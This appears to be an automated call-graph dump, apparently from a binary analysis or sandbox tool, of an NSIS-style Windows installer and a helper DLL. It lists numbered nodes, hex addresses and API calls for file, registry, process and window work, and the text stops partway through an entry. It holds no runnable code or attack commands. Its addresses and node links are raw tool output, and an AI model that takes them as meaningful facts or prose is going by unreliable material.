402bbf 18 API calls 4923->4924 4925 40197a 4924->4925 4926 40198e lstrlenW 4925->4926 4927 4019ca 4925->4927 4928 401998 4926->4928 4928->4927 4932 406055 lstrcpynW 4928->4932 4930 4019b3 4930->4927 4931 4019c0 lstrlenW 4930->4931 4931->4927 4932->4930 4933 401662 4934 402bbf 18 API calls 4933->4934 4935 401668 4934->4935 4936 406398 2 API calls 4935->4936 4937 40166e 4936->4937 4938 4019e4 4939 402bbf 18 API calls 4938->4939 4940 4019eb 4939->4940 4941 402bbf 18 API calls 4940->4941 4942 4019f4 4941->4942 4943 4019fb lstrcmpiW 4942->4943 4944 401a0d lstrcmpW 4942->4944 4945 401a01 4943->4945 4944->4945 4485 4025e5 4499 402ba2 4485->4499 4487 40263a ReadFile 4494 4025f4 4487->4494 4498 40272d 4487->4498 4488 4026d3 4488->4494 4488->4498 4502 405d0b SetFilePointer 4488->4502 4489 405cad ReadFile 4489->4494 4491 40267a MultiByteToWideChar 4491->4494 4492 40272f 4511 405f9c wsprintfW 4492->4511 4494->4487 4494->4488 4494->4489 4494->4491 4494->4492 4495 4026a0 SetFilePointer MultiByteToWideChar 4494->4495 4496 402740 4494->4496 4494->4498 4495->4494 4497 402761 SetFilePointer 4496->4497 4496->4498 4497->4498 4500 406077 18 API calls 4499->4500 4501 402bb6 4500->4501 4501->4494 4503 405d27 4502->4503 4504 405d43 4502->4504 4505 405cad ReadFile 4503->4505 4504->4488 4506 405d33 4505->4506 4506->4504 4507 405d74 SetFilePointer 4506->4507 4508 405d4c SetFilePointer 4506->4508 4507->4504 4508->4507 4509 405d57 4508->4509 4510 405cdc WriteFile 4509->4510 4510->4504 4511->4498 4946 401e66 4947 402bbf 18 API calls 4946->4947 4948 401e6c 4947->4948 4949 4051b4 25 API calls 4948->4949 4950 401e76 4949->4950 4951 405735 2 API calls 4950->4951 4952 401e7c 4951->4952 4953 401edb CloseHandle 4952->4953 4954 401e8c WaitForSingleObject 4952->4954 4955 40281e 4952->4955 4953->4955 4956 401e9e 4954->4956 4957 401eb0 GetExitCodeProcess 4956->4957 4958 406467 2 API calls 4956->4958 4959 401ec2 4957->4959 4960 401ecd 4957->4960 4961 401ea5 WaitForSingleObject 4958->4961 4963 405f9c wsprintfW 4959->4963 4960->4953 4961->4956 4963->4960 4521 401767 4522 402bbf 18 API calls 4521->4522 4523 40176e 4522->4523 4524 401796 4523->4524 4525 40178e 4523->4525 4562 406055 lstrcpynW 4524->4562 4561 406055 lstrcpynW 4525->4561 4528 401794 4532 4062e9 5 API calls 4528->4532 4529 4017a1 4530 405a09 3 API calls 4529->4530 4531 4017a7 lstrcatW 4530->4531 4531->4528 4539 4017b3 4532->4539 4533 406398 2 API calls 4533->4539 4534 4017ef 4535 405c05 2 API calls 4534->4535 4535->4539 4537 4017c5 CompareFileTime 4537->4539 4538 401885 4540 4051b4 25 API calls 4538->4540 4539->4533 4539->4534 4539->4537 4539->4538 4542 406055 lstrcpynW 4539->4542 4547 406077 18 API calls 4539->4547 4555 40579a MessageBoxIndirectW 4539->4555 4558 40185c 4539->4558 4560 405c2a GetFileAttributesW CreateFileW 4539->4560 4543 40188f 4540->4543 4541 4051b4 25 API calls 4559 401871 4541->4559 4542->4539 4544 403027 32 API calls 4543->4544 4545 4018a2 4544->4545 4546 4018b6 SetFileTime 4545->4546 4548 4018c8 CloseHandle 4545->4548 4546->4548 4547->4539 4549 4018d9 4548->4549 4548->4559 4550 4018f1 4549->4550 4551 4018de 4549->4551 4552 406077 18 API calls 4550->4552 4553 406077 18 API calls 4551->4553 4554 4018f9 4552->4554 4556 4018e6 lstrcatW 4553->4556 4557 40579a MessageBoxIndirectW 4554->4557 4555->4539 4556->4554 4557->4559 4558->4541 4558->4559 4560->4539 4561->4528 4562->4529 4964 404267 lstrlenW 4965 404286 4964->4965 4966 404288 WideCharToMultiByte 4964->4966 4965->4966 4967 100018a9 4968 100018cc 4967->4968 4969 100018ff GlobalFree 4968->4969 4970 10001911 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 4968->4970 4969->4970 4971 10001272 2 API calls 4970->4971 4972 10001a87 GlobalFree GlobalFree 4971->4972 4973 401ee9 4974 402bbf 18 API calls 4973->4974 4975 401ef0 4974->4975 4976 406398 2 API calls 4975->4976 4977 401ef6 4976->4977 4979 401f07 4977->4979 4980 405f9c wsprintfW 4977->4980 4980->4979 4981 4021ea 4982 402bbf 18 API calls 4981->4982 4983 4021f0 4982->4983 4984 402bbf 18 API calls 4983->4984 4985 4021f9 4984->4985 4986 402bbf 18 API calls 4985->4986 4987 402202 4986->4987 4988 406398 2 API calls 4987->4988 4989 40220b 4988->4989 4990 40221c lstrlenW lstrlenW 4989->4990 4991 40220f 4989->4991 4993 4051b4 25 API calls 4990->4993 4992 4051b4 25 API calls 4991->4992 4995 402217 4991->4995 4992->4995 4994 40225a SHFileOperationW 4993->4994 4994->4991 4994->4995 4996 40156b 4997 401584 4996->4997 4998 40157b ShowWindow 4996->4998 4999 401592 ShowWindow 4997->4999 5000 402a4c 4997->5000 4998->4997 4999->5000 5001 40456d 5002 4045a3 5001->5002 5003 40457d 5001->5003 5004 404180 8 API calls 5002->5004 5005 404119 19 API calls 5003->5005 5006 4045af 5004->5006 5007 40458a SetDlgItemTextW 5005->5007 5007->5002 5008 40226e 5009 402275 5008->5009 5011 402288 5008->5011 5010 406077 18 API calls 5009->5010 5012 402282 5010->5012 5013 40579a MessageBoxIndirectW 5012->5013 5013->5011 5014 4014f1 SetForegroundWindow 5015 402a4c 5014->5015 5016 401673 5017 402bbf 18 API calls 5016->5017 5018 40167a 5017->5018 5019 402bbf 18 API calls 5018->5019 5020 401683 5019->5020 5021 402bbf 18 API calls 5020->5021 5022 40168c MoveFileW 5021->5022 5023 40169f 5022->5023 5029 401698 5022->5029 5025 406398 2 API calls 5023->5025 5027 4021e1 5023->5027 5024 401423 25 API calls 5024->5027 5026 4016ae 5025->5026 5026->5027 5028 405ef6 38 API calls 5026->5028 5028->5029 5029->5024 5030 4052f3 5031 405314 GetDlgItem GetDlgItem GetDlgItem 5030->5031 5032 40549d 5030->5032 5075 40414e SendMessageW 5031->5075 5034 4054a6 GetDlgItem CreateThread CloseHandle 5032->5034 5035 4054ce 5032->5035 5034->5035 5037 4054f9 5035->5037 5038 4054e5 ShowWindow ShowWindow 5035->5038 5039 40551e 5035->5039 5036 405384 5044 40538b GetClientRect GetSystemMetrics SendMessageW SendMessageW 5036->5044 5041 405533 ShowWindow 5037->5041 5042 40550d 5037->5042 5045 405559 5037->5045 5077 40414e SendMessageW 5038->5077 5043 404180 8 API calls 5039->5043 5048 405553 5041->5048 5049 405545 5041->5049 5046 4040f2 SendMessageW 5042->5046 5047 40552c 5043->5047 5050 4053f9 5044->5050 5051 4053dd SendMessageW SendMessageW 5044->5051 5045->5039 5052 405567 SendMessageW 5045->5052 5046->5039 5057 4040f2 SendMessageW 5048->5057 5056 4051b4 25 API calls 5049->5056 5053 40540c 5050->5053 5054 4053fe SendMessageW 5050->5054 5051->5050 5052->5047 5055 405580 CreatePopupMenu 5052->5055 5059 404119 19 API calls 5053->5059 5054->5053 5058 406077 18 API calls 5055->5058 5056->5048 5057->5045 5060 405590 AppendMenuW 5058->5060 5061 40541c 5059->5061 5062 4055c0 TrackPopupMenu 5060->5062 5063 4055ad GetWindowRect 5060->5063 5064 405425 ShowWindow 5061->5064 5065 405459 GetDlgItem SendMessageW 5061->5065 5062->5047 5066 4055db 5062->5066 5063->5062 5067 405448 5064->5067 5068 40543b ShowWindow 5064->5068 5065->5047 5069 405480 SendMessageW SendMessageW 5065->5069 5070 4055f7 SendMessageW 5066->5070 5076 40414e SendMessageW 5067->5076 5068->5067 5069->5047 5070->5070 5071 405614 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5070->5071 5073 405639 SendMessageW 5071->5073 5073->5073 5074 405662 GlobalUnlock SetClipboardData CloseClipboard 5073->5074 5074->5047 5075->5036 5076->5065 5077->5037 5078 100016b6 5079 100016e5 5078->5079 5080 10001b18 22 API calls 5079->5080 5081 100016ec 5080->5081 5082 100016f3 5081->5082 5083 100016ff 5081->5083 5084 10001272 2 API calls 5082->5084 5085 10001726 5083->5085 5086 10001709 5083->5086 5087 100016fd 5084->5087 5089 10001750 5085->5089 5090 1000172c 5085->5090 5088 1000153d 3 API calls 5086->5088 5092 1000170e 5088->5092 5091 1000153d 3 API calls 5089->5091 5093 100015b4 3 API calls 5090->5093 5091->5087 5094 100015b4 3 API calls 5092->5094 5095 10001731 5093->5095 5096 10001714 5094->5096 5097 10001272 2 API calls 5095->5097 5099 10001272 2 API calls 5096->5099 5098 10001737 GlobalFree 5097->5098 5098->5087 5100 1000174b GlobalFree 5098->5100 5101 1000171a GlobalFree 5099->5101 5100->5087 5101->5087 5102 10002238 5103 10002296 5102->5103 5105 100022cc 5102->5105 5104 100022a8 GlobalAlloc 5103->5104 5103->5105 5104->5103 5106 401cfa GetDlgItem GetClientRect 5107 402bbf 18 API calls 5106->5107 5108 401d2c LoadImageW SendMessageW 5107->5108 5109 401d4a DeleteObject 5108->5109 5110 402a4c 5108->5110 5109->5110 4730 4027fb 4731 402bbf 18 API calls 4730->4731 4732 402802 FindFirstFileW 4731->4732 4733 40282a 4732->4733 4737 402815 4732->4737 4734 402833 4733->4734 4738 405f9c wsprintfW 4733->4738 4739 406055 lstrcpynW 4734->4739 4738->4734 4739->4737 4740 40237b 4741 402381 4740->4741 4742 402bbf 18 API calls 4741->4742 4743 402393 4742->4743 4744 402bbf 18 API calls 4743->4744 4745 40239d RegCreateKeyExW 4744->4745 4746 4023c7 4745->4746 4749 40281e 4745->4749 4747 4023e2 4746->4747 4748 402bbf 18 API calls 4746->4748 4751 402ba2 18 API calls 4747->4751 4753 4023ee 4747->4753 4750 4023d8 lstrlenW 4748->4750 4750->4747 4751->4753 4752 402409 RegSetValueExW 4755 40241f RegCloseKey 4752->4755 4753->4752 4754 403027 32 API calls 4753->4754 4754->4752 4755->4749 5111 1000103d 5112 1000101b 5 API calls 5111->5112 5113 10001056 5112->5113 5114 4014ff 5115 401507 5114->5115 5117 40151a 5114->5117 5116 402ba2 18 API calls 5115->5116 5116->5117 5118 401000 5119 401037 BeginPaint GetClientRect 5118->5119 5120 40100c DefWindowProcW 5118->5120 5122 4010f3 5119->5122 5123 401179 5120->5123 5124 401073 CreateBrushIndirect FillRect DeleteObject 5122->5124 5125 4010fc 5122->5125 5124->5122 5126 401102 CreateFontIndirectW 5125->5126 5127 401167 EndPaint 5125->5127 5126->5127 5128 401112 6 API calls 5126->5128 5127->5123 5128->5127 5129 401904 5130 40193b 5129->5130 5131 402bbf 18 API calls 5130->5131 5132 401940 5131->5132 5133 405846 69 API calls 5132->5133 5134 401949 5133->5134 5135 402d04 5136 402d16 SetTimer 5135->5136 5138 402d2f 5135->5138 5136->5138 5137 402d84 5138->5137 5139 402d49 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5138->5139 5139->5137 4512 402786 4513 4029f7 4512->4513 4514 40278d 4512->4514 4515 402ba2 18 API calls 4514->4515 4516 402798 4515->4516 4517 40279f SetFilePointer 4516->4517 4517->4513 4518 4027af 4517->4518 4520 405f9c wsprintfW 4518->4520 4520->4513 4563 100027c7 4564 10002817 4563->4564 4565 100027d7 VirtualProtect 4563->4565 4565->4564 5140 401907 5141 402bbf 18 API calls 5140->5141 5142 40190e 5141->5142 5143 40579a MessageBoxIndirectW 5142->5143 5144 401917 5143->5144 5145 401e08 5146 402bbf 18 API calls 5145->5146 5147 401e0e 5146->5147 5148 402bbf 18 API calls 5147->5148 5149 401e17 5148->5149 5150 402bbf 18 API calls 5149->5150 5151 401e20 5150->5151 5152 402bbf 18 API calls 5151->5152 5153 401e29 5152->5153 5154 401423 25 API calls 5153->5154 5155 401e30 ShellExecuteW 5154->5155 5156 401e61 5155->5156 5162 40490a 5163 404936 5162->5163 5164 40491a 5162->5164 5166 404969 5163->5166 5167 40493c SHGetPathFromIDListW 5163->5167 5173 40577e GetDlgItemTextW 5164->5173 5169 404953 SendMessageW 5167->5169 5170 40494c 5167->5170 5168 404927 SendMessageW 5168->5163 5169->5166 5172 40140b 2 API calls 5170->5172 5172->5169 5173->5168 5174 1000164f 5175 10001516 GlobalFree 5174->5175 5177 10001667 5175->5177 5176 100016ad GlobalFree 5177->5176 5178 10001682 5177->5178 5179 10001699 VirtualFree 5177->5179 5178->5176 5179->5176 4688 402095 4689 402bbf 18 API calls 4688->4689 4690 40209c 4689->4690 4691 402bbf 18 API calls 4690->4691 4692 4020a6 4691->4692 4693 402bbf 18 API calls 4692->4693 4694 4020b0 4693->4694 4695 402bbf 18 API calls 4694->4695 4696 4020ba 4695->4696 4697 402bbf 18 API calls 4696->4697 4699 4020c4 4697->4699 4698 402103 CoCreateInstance 4703 402122 4698->4703 4699->4698 4700 402bbf 18 API calls 4699->4700 4700->4698 4701 401423 25 API calls 4702 4021e1 4701->4702 4703->4701 4703->4702 5180 401a15 5181 402bbf 18 API calls 5180->5181 5182 401a1e ExpandEnvironmentStringsW 5181->5182 5183 401a32 5182->5183 5185 401a45 5182->5185 5184 401a37 lstrcmpW 5183->5184 5183->5185 5184->5185 5186 402515 5187 402bbf 18 API calls 5186->5187 5188 40251c 5187->5188 5191 405c2a GetFileAttributesW CreateFileW 5188->5191 5190 402528 5191->5190 5192 401b16 5193 402bbf 18 API calls 5192->5193 5194 401b1d 5193->5194 5195 402ba2 18 API calls 5194->5195 5196 401b26 wsprintfW 5195->5196 5197 402a4c 5196->5197 5198 10001058 5200 10001074 5198->5200 5199 100010dd 5200->5199 5201 10001516 GlobalFree 5200->5201 5202 10001092 5200->5202 5201->5202 5203 10001516 GlobalFree 5202->5203 5204 100010a2 5203->5204 5205 100010b2 5204->5205 5206 100010a9 GlobalSize 5204->5206 5207 100010b6 GlobalAlloc 5205->5207 5208 100010c7 5205->5208 5206->5205 5209 1000153d 3 API calls 5207->5209 5210 100010d2 GlobalFree 5208->5210 5209->5208 5210->5199 4757 40159b 4758 402bbf 18 API calls 4757->4758 4759 4015a2 SetFileAttributesW 4758->4759 4760 4015b4 4759->4760 4769 40229d 4770 4022a5 4769->4770 4771 4022ab 4769->4771 4772 402bbf 18 API calls 4770->4772 4773 4022b9 4771->4773 4774 402bbf 18 API calls 4771->4774 4772->4771 4775 4022c7 4773->4775 4776 402bbf 18 API calls 4773->4776 4774->4773 4777 402bbf 18 API calls 4775->4777 4776->4775 4778 4022d0 WritePrivateProfileStringW 4777->4778 5211 401f1d 5212 402bbf 18 API calls 5211->5212 5213 401f24 5212->5213 5214 40642b 5 API calls 5213->5214 5215 401f33 5214->5215 5216 401fb7 5215->5216 5217 401f4f GlobalAlloc 5215->5217 5217->5216 5218 401f63 5217->5218 5219 40642b 5 API calls 5218->5219 5220 401f6a 5219->5220 5221 40642b 5 API calls 5220->5221 5222 401f74 5221->5222 5222->5216 5226 405f9c wsprintfW 5222->5226 5224 401fa9 5227 405f9c wsprintfW 5224->5227 5226->5224 5227->5216 5228 40149e 5229 402288 5228->5229 5230 4014ac PostQuitMessage 5228->5230 5230->5229 5231 40249e 5232 402cc9 19 API calls 5231->5232 5233 4024a8 5232->5233 5234 402ba2 18 API calls 5233->5234 5235 4024b1 5234->5235 5236 4024d5 RegEnumValueW 5235->5236 5237 4024c9 RegEnumKeyW 5235->5237 5239 40281e 5235->5239 5238 4024ee RegCloseKey 5236->5238 5236->5239 5237->5238 5238->5239 5241 40231f 5242 402324 5241->5242 5243 40234f 5241->5243 5244 402cc9 19 API calls 5242->5244 5245 402bbf 18 API calls 5243->5245 5246 40232b 5244->5246 5247 402356 5245->5247 5248 402bbf 18 API calls 5246->5248 5251 40236c 5246->5251 5252 402bff RegOpenKeyExW 5247->5252 5249 40233c RegDeleteValueW RegCloseKey 5248->5249 5249->5251 5259 402c76 5252->5259 5260 402c2a 5252->5260 5253 402c50 RegEnumKeyW 5254 402c62 RegCloseKey 5253->5254 5253->5260 5256 40642b 5 API calls 5254->5256 5255 402c87 RegCloseKey 5255->5259 5258 402c72 5256->5258 5257 402bff 5 API calls 5257->5260 5258->5259 5261 402ca2 RegDeleteKeyW 5258->5261 5259->5251 5260->5253 5260->5254 5260->5255 5260->5257 5261->5259 3716 4032a0 SetErrorMode GetVersion 3717 4032d4 3716->3717 3718 4032da 3716->3718 3719 40642b 5 API calls 3717->3719 3807 4063bf GetSystemDirectoryW 3718->3807 3719->3718 3721 4032f1 3722 4063bf 3 API calls 3721->3722 3723 4032fb 3722->3723 3724 4063bf 3 API calls 3723->3724 3725 403305 3724->3725 3810 40642b GetModuleHandleA 3725->3810 3728 40642b 5 API calls 3729 403313 #17 OleInitialize SHGetFileInfoW 3728->3729 3816 406055 lstrcpynW 3729->3816 3731 403350 GetCommandLineW 3817 406055 lstrcpynW 3731->3817 3733 403362 GetModuleHandleW 3734 40337a 3733->3734 3818 405a36 3734->3818 3737 4034b4 GetTempPathW 3822 40326f 3737->3822 3739 4034cc 3740 4034d0 GetWindowsDirectoryW lstrcatW 3739->3740 3741 403526 DeleteFileW 3739->3741 3743 40326f 12 API calls 3740->3743 3832 402dee GetTickCount GetModuleFileNameW 3741->3832 3742 4033a2 3744 405a36 CharNextW 3742->3744 3749 40349d 3742->3749 3751 40349f 3742->3751 3747 4034ec 3743->3747 3744->3742 3746 40353a 3753 405a36 CharNextW 3746->3753 3789 4035dd 3746->3789 3802 4035ed 3746->3802 3747->3741 3748 4034f0 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3747->3748 3752 40326f 12 API calls 3748->3752 3749->3737 3916 406055 lstrcpynW 3751->3916 3757 40351e 3752->3757 3770 403559 3753->3770 3757->3741 3757->3802 3758 403728 3761 403730 GetCurrentProcess OpenProcessToken 3758->3761 3762 4037ac ExitProcess 3758->3762 3759 403608 3940 40579a 3759->3940 3767 403748 LookupPrivilegeValueW AdjustTokenPrivileges 3761->3767 3768 40377c 3761->3768 3764 4035b7 3917 405b11 3764->3917 3765 40361e 3944 40571d 3765->3944 3767->3768 3769 40642b 5 API calls 3768->3769 3784 403783 3769->3784 3770->3764 3770->3765 3775 403798 ExitWindowsEx 3775->3762 3779 4037a5 3775->3779 3776 403634 lstrcatW 3777 40363f lstrcatW lstrcmpiW 3776->3777 3778 40365b 3777->3778 3777->3802 3782 403660 3778->3782 3783 403667 3778->3783 3982 40140b 3779->3982 3781 4035d2 3932 406055 lstrcpynW 3781->3932 3947 405683 CreateDirectoryW 3782->3947 3952 405700 CreateDirectoryW 3783->3952 3784->3775 3784->3779 3860 40389e 3789->3860 3791 40366c SetCurrentDirectoryW 3792 403687 3791->3792 3793 40367c 3791->3793 3956 406055 lstrcpynW 3792->3956 3955 406055 lstrcpynW 3793->3955 3798 4036d3 CopyFileW 3804 403695 3798->3804 3799 40371c 3801 405ef6 38 API calls 3799->3801 3801->3802 3933 4037c4 3802->3933 3803 406077 18 API calls 3803->3804 3804->3799 3804->3803 3806 403707 CloseHandle 3804->3806 3957 406077 3804->3957 3975 405ef6 MoveFileExW 3804->3975 3979 405735 CreateProcessW 3804->3979 3806->3804 3808 4063e1 wsprintfW LoadLibraryW 3807->3808 3808->3721 3811 406451 GetProcAddress 3810->3811 3812 406447 3810->3812 3814 40330c 3811->3814 3813 4063bf 3 API calls 3812->3813 3815 40644d 3813->3815 3814->3728 3815->3811 3815->3814 3816->3731 3817->3733 3819 405a3c 3818->3819 3820 403389 CharNextW 3819->3820 3821 405a43 CharNextW 3819->3821 3820->3737 3820->3742 3821->3819 3985 4062e9 3822->3985 3824 403285 3824->3739 3825 40327b 3825->3824 3994 405a09 lstrlenW CharPrevW 3825->3994 3828 405700 2 API calls 3829 403293 3828->3829 3997 405c59 3829->3997 4001 405c2a GetFileAttributesW CreateFileW 3832->4001 3834 402e2e 3853 402e3e 3834->3853 4002 406055 lstrcpynW 3834->4002 3836 402e54 4003 405a55 lstrlenW 3836->4003 3840 402e65 GetFileSize 3841 402f61 3840->3841 3859 402e7c 3840->3859 4008 402d8a 3841->4008 3843 402f6a 3845 402f9a GlobalAlloc 3843->3845 3843->3853 4043 403258 SetFilePointer 3843->4043 4019 403258 SetFilePointer 3845->4019 3846 402fcd 3850 402d8a 6 API calls 3846->3850 3849 402fb5 4020 403027 3849->4020 3850->3853 3851 402f83 3854 403242 ReadFile 3851->3854 3853->3746 3856 402f8e 3854->3856 3855 402d8a 6 API calls 3855->3859 3856->3845 3856->3853 3857 402fc1 3857->3853 3857->3857 3858 402ffe SetFilePointer 3857->3858 3858->3853 3859->3841 3859->3846 3859->3853 3859->3855 4040 403242 3859->4040 3861 40642b 5 API calls 3860->3861 3862 4038b2 3861->3862 3863 4038b8 GetUserDefaultUILanguage 3862->3863 3864 4038ca 3862->3864 4064 405f9c wsprintfW 3863->4064 4074 405f22 RegOpenKeyExW 3864->4074 3867 4038c8 4065 403b74 3867->4065 3869 403919 lstrcatW 3869->3867 3870 405f22 3 API calls 3870->3869 3873 405b11 18 API calls 3874 40394b 3873->3874 3875 4039df 3874->3875 3877 405f22 3 API calls 3874->3877 3876 405b11 18 API calls 3875->3876 3878 4039e5 3876->3878 3879 40397d 3877->3879 3880 4039f5 LoadImageW 3878->3880 3881 406077 18 API calls 3878->3881 3879->3875 3884 40399e lstrlenW 3879->3884 3888 405a36 CharNextW 3879->3888 3882 403a9b 3880->3882 3883 403a1c RegisterClassW 3880->3883 3881->3880 3887 40140b 2 API calls 3882->3887 3885 403a52 SystemParametersInfoW CreateWindowExW 3883->3885 3886 403aa5 3883->3886 3889 4039d2 3884->3889 3890 4039ac lstrcmpiW 3884->3890 3885->3882 3886->3802 3891 403aa1 3887->3891 3892 40399b 3888->3892 3894 405a09 3 API calls 3889->3894 3890->3889 3893 4039bc GetFileAttributesW 3890->3893 3891->3886 3896 403b74 19 API calls 3891->3896 3892->3884 3895 4039c8 3893->3895 3897 4039d8 3894->3897 3895->3889 3899 405a55 2 API calls 3895->3899 3900 403ab2 3896->3900 4079 406055 lstrcpynW 3897->4079 3899->3889 3901 403b41 3900->3901 3902 403abe ShowWindow 3900->3902 4080 405287 OleInitialize 3901->4080 3903 4063bf 3 API calls 3902->3903 3905 403ad6 3903->3905 3907 403ae4 GetClassInfoW 3905->3907 3910 4063bf 3 API calls 3905->3910 3906 403b47 3908 403b63 3906->3908 3909 403b4b 3906->3909 3912 403af8 GetClassInfoW RegisterClassW 3907->3912 3913 403b0e DialogBoxParamW 3907->3913 3911 40140b 2 API calls 3908->3911 3909->3886 3914 40140b 2 API calls 3909->3914 3910->3907 3911->3886 3912->3913 3915 40140b 2 API calls 3913->3915 3914->3886 3915->3886 3916->3749 4095 406055 lstrcpynW 3917->4095 3919 405b22 4096 405ab4 CharNextW CharNextW 3919->4096 3922 4035c3 3922->3802 3931 406055 lstrcpynW 3922->3931 3923 4062e9 5 API calls 3924 405b38 3923->3924 3924->3922 3925 405b69 lstrlenW 3924->3925 3930 405a55 2 API calls 3924->3930 4102 406398 FindFirstFileW 3924->4102 3925->3924 3926 405b74 3925->3926 3927 405a09 3 API calls 3926->3927 3929 405b79 GetFileAttributesW 3927->3929 3929->3922 3930->3925 3931->3781 3932->3789 3934 4037dc 3933->3934 3935 4037ce CloseHandle 3933->3935 4105 403809 3934->4105 3935->3934 3941 4057af 3940->3941 3942 4057c3 MessageBoxIndirectW 3941->3942 3943 403616 ExitProcess 3941->3943 3942->3943 3945 40642b 5 API calls 3944->3945 3946 403623 lstrcatW 3945->3946 3946->3776 3946->3777 3948 403665 3947->3948 3949 4056d4 GetLastError 3947->3949 3948->3791 3949->3948 3950 4056e3 SetFileSecurityW 3949->3950 3950->3948 3951 4056f9 GetLastError 3950->3951 3951->3948 3953 405710 3952->3953 3954 405714 GetLastError 3952->3954 3953->3791 3954->3953 3955->3792 3956->3804 3966 406084 3957->3966 3958 4062cf 3959 4036c6 DeleteFileW 3958->3959 4164 406055 lstrcpynW 3958->4164 3959->3798 3959->3804 3961 406137 GetVersion 3961->3966 3962 40629d lstrlenW 3962->3966 3965 406077 10 API calls 3965->3962 3966->3958 3966->3961 3966->3962 3966->3965 3967 405f22 3 API calls 3966->3967 3968 4061b2 GetSystemDirectoryW 3966->3968 3969 4061c5 GetWindowsDirectoryW 3966->3969 3970 4062e9 5 API calls 3966->3970 3971 4061f9 SHGetSpecialFolderLocation 3966->3971 3972 406077 10 API calls 3966->3972 3973 40623e lstrcatW 3966->3973 4162 405f9c wsprintfW 3966->4162 4163 406055 lstrcpynW 3966->4163 3967->3966 3968->3966 3969->3966 3970->3966 3971->3966 3974 406211 SHGetPathFromIDListW CoTaskMemFree 3971->3974 3972->3966 3973->3966 3974->3966 3976 405f17 3975->3976 3977 405f0a 3975->3977 3976->3804 4165 405d84 lstrcpyW 3977->4165 3980 405774 3979->3980 3981 405768 CloseHandle 3979->3981 3980->3804 3981->3980 3983 401389 2 API calls 3982->3983 3984 401420 3983->3984 3984->3762 3992 4062f6 3985->3992 3986 40636c 3987 406371 CharPrevW 3986->3987 3989 406392 3986->3989 3987->3986 3988 40635f CharNextW 3988->3986 3988->3992 3989->3825 3990 405a36 CharNextW 3990->3992 3991 40634b CharNextW 3991->3992 3992->3986 3992->3988 3992->3990 3992->3991 3993 40635a CharNextW 3992->3993 3993->3988 3995 40328d 3994->3995 3996 405a25 lstrcatW 3994->3996 3995->3828 3996->3995 3998 405c66 GetTickCount GetTempFileNameW 3997->3998 3999 40329e 3998->3999 4000 405c9c 3998->4000 3999->3739 4000->3998 4000->3999 4001->3834 4002->3836 4004 405a63 4003->4004 4005 402e5a 4004->4005 4006 405a69 CharPrevW 4004->4006 4007 406055 lstrcpynW 4005->4007 4006->4004 4006->4005 4007->3840 4009 402d93 4008->4009 4010 402dab 4008->4010 4011 402da3 4009->4011 4012 402d9c DestroyWindow 4009->4012 4013 402db3 4010->4013 4014 402dbb GetTickCount 4010->4014 4011->3843 4012->4011 4044 406467 4013->4044 4016 402dc9 CreateDialogParamW ShowWindow 4014->4016 4017 402dec 4014->4017 4016->4017 4017->3843 4019->3849 4021 403040 4020->4021 4022 40306e 4021->4022 4050 403258 SetFilePointer 4021->4050 4024 403242 ReadFile 4022->4024 4025 403079 4024->4025 4026 4031db 4025->4026 4027 40308b GetTickCount 4025->4027 4035 4031c5 4025->4035 4028 40321d 4026->4028 4033 4031df 4026->4033 4027->4035 4039 4030da 4027->4039 4029 403242 ReadFile 4028->4029 4029->4035 4030 403242 ReadFile 4030->4039 4031 403242 ReadFile 4031->4033 4032 405cdc WriteFile 4032->4033 4033->4031 4033->4032 4033->4035 4034 403130 GetTickCount 4034->4039 4035->3857 4036 403155 MulDiv wsprintfW 4051 4051b4 4036->4051 4039->4030 4039->4034 4039->4035 4039->4036 4048 405cdc WriteFile 4039->4048 4062 405cad ReadFile 4040->4062 4043->3851 4045 406484 PeekMessageW 4044->4045 4046 402db9 4045->4046 4047 40647a DispatchMessageW 4045->4047 4046->3843 4047->4045 4049 405cfa 4048->4049 4049->4039 4050->4022 4052 405271 4051->4052 4053 4051cf 4051->4053 4052->4039 4054 4051eb lstrlenW 4053->4054 4057 406077 18 API calls 4053->4057 4055 405214 4054->4055 4056 4051f9 lstrlenW 4054->4056 4059 405227 4055->4059 4060 40521a SetWindowTextW 4055->4060 4056->4052 4058 40520b lstrcatW 4056->4058 4057->4054 4058->4055 4059->4052 4061 40522d SendMessageW SendMessageW SendMessageW 4059->4061 4060->4059 4061->4052 4063 403255 4062->4063 4063->3859 4064->3867 4066 403b88 4065->4066 4087 405f9c wsprintfW 4066->4087 4068 403bf9 4069 406077 18 API calls 4068->4069 4070 403c05 SetWindowTextW 4069->4070 4071 403c21 4070->4071 4072 403929 4070->4072 4071->4072 4073 406077 18 API calls 4071->4073 4072->3873 4073->4071 4075 4038fa 4074->4075 4076 405f56 RegQueryValueExW 4074->4076 4075->3869 4075->3870 4078 405f77 RegCloseKey 4076->4078 4078->4075 4079->3875 4088 404165 4080->4088 4082 4052aa 4086 4052d1 4082->4086 4091 401389 4082->4091 4083 404165 SendMessageW 4084 4052e3 OleUninitialize 4083->4084 4084->3906 4086->4083 4087->4068 4089 40417d 4088->4089 4090 40416e SendMessageW 4088->4090 4089->4082 4090->4089 4093 401390 4091->4093 4092 4013fe 4092->4082 4093->4092 4094 4013cb MulDiv SendMessageW 4093->4094 4094->4093 4095->3919 4097 405ad1 4096->4097 4098 405ae3 4096->4098 4097->4098 4099 405ade CharNextW 4097->4099 4100 405b07 4098->4100 4101 405a36 CharNextW 4098->4101 4099->4100 4100->3922 4100->3923 4101->4098 4103 4063b9 4102->4103 4104 4063ae FindClose 4102->4104 4103->3924 4104->4103 4106 403817 4105->4106 4107 4037e1 4106->4107 4108 40381c FreeLibrary GlobalFree 4106->4108 4109 405846 4107->4109 4108->4107 4108->4108 4110 405b11 18 API calls 4109->4110 4111 405866 4110->4111 4112 405885 4111->4112 4113 40586e DeleteFileW 4111->4113 4115 4059b0 4112->4115 4149 406055 lstrcpynW 4112->4149 4114 4035f6 OleUninitialize 4113->4114 4114->3758 4114->3759 4115->4114 4120 406398 2 API calls 4115->4120 4117 4058ab 4118 4058b1 lstrcatW 4117->4118 4119 4058be 4117->4119 4121 4058c4 4118->4121 4122 405a55 2 API calls 4119->4122 4125 4059ca 4120->4125 4123 4058d4 lstrcatW 4121->4123 4124 4058ca 4121->4124 4122->4121 4126 4058df lstrlenW FindFirstFileW 4123->4126 4124->4123 4124->4126 4125->4114 4127 4059ce 4125->4127 4128 405901 4126->4128 4129 4059a5 4126->4129 4130 405a09 3 API calls 4127->4130 4132 405988 FindNextFileW 4128->4132 4142 405846 62 API calls 4128->4142 4144 4051b4 25 